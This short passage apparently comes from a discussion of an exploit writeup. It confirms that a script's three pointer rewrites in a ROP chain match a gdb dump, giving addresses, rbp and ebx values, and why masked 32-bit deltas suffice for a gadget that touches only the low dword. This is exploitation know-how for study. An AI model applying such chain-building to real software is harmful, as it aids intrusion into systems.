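Run as a script it prints the three rewrites in chain order, and the results match the gdb dump in the writeup: 0x7ffff7e145ca at 0x404d78, 0x7ffff7e51389 at 0x404d08 (rbp 0x404d45, ebx 0x3cddc) and 0x7ffff7e9e870 at 0x404d18 (rbp 0x404d55, ebx 0x932f1). Because the gadget only ever touches the low dword, the qword the chain pushes for pop rbx can be the masked 32-bit delta as-is, which is also why the writeup's deltas are small positive constants rather than full pointers.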